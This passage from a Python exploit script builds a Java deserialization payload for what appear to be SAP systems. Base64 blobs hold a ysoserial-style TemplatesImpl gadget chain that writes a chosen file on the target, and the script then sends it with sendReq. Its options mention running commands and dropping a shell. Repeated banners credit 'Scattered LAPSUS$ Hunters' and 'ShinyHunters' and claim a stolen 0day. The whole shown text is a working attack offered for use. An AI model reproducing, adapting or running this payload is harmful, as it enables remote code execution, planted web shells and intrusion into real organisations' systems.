hT2JqZWN09FHcqgC28MwCAAB4cHNxAH4ABT9AAAAAAAAAdwgAAAAQAAAAAHhzcQB+AEV0AAhPcGVuVHlwZXQAC2NvbS5zYXAuc2Rvc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0/BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAzTAARX291dHB1dFByb3BlcnRpZXNxAH4AAXhwAAAAAP////91cgADW1tCS/0ZFWdn2zcCAAB4cAAAAAJ1cgACW0Ks8xf4BghU4AIAAHhwAAA=")

    p1 = base64.b64decode("yv66vgAAADIARgoAAwAiBwBEBwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEAIUdhZGdldHMuamF2YSBmcm9tIElucHV0RmlsZU9iamVjdAwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQAYamF2YS9pby9GaWxlT3V0cHV0U3RyZWFtBwAqAQ==")

    p2 = base64.b64decode("CAAsAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWDAAKAC4KACsALwEAFnN1bi9taXNjL0JBU0U2NERlY29kZXIHADEKADIAIgE=")
    tail = base64.b64decode("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")
    newContentSizeOffset = 0x142b + fileNameLen + 0x3e 
    print("MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- fuck da CCP man dey stole our 0day frfr ---- MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----")
    newContent = head + total_size_bytes + p1 + fileNameLen.to_bytes(2, byteorder='big') + fileName.encode() + p2 + len(content).to_bytes(2, byteorder='big') + content.encode() + tail
    random_numbers = str(random.randint(10**13, 10**14-1))
    random_numbers = random_numbers.encode()
    # newContent = newContent.replace(b"ysoserial", b"xsyseryal").replace(b"Gadgets", b"Havgstt").replace(b"271345770892700", random_numbers)
    
    # print(hex(len(head + total_size_bytes + p1 )))
    # print((fileNameLen.to_bytes(2, byteorder='big')))

    # f = open("aaa.ser", "wb")
    # f.write(newContent)
    # f.close()
    # exit()
    sendReq(newContent, True)
    
            

else:
    print("[-] You must provide either --command or --dropshell")
    exit(1)

## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----
## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----
## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----
## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----
## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----
## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----
## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----
## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----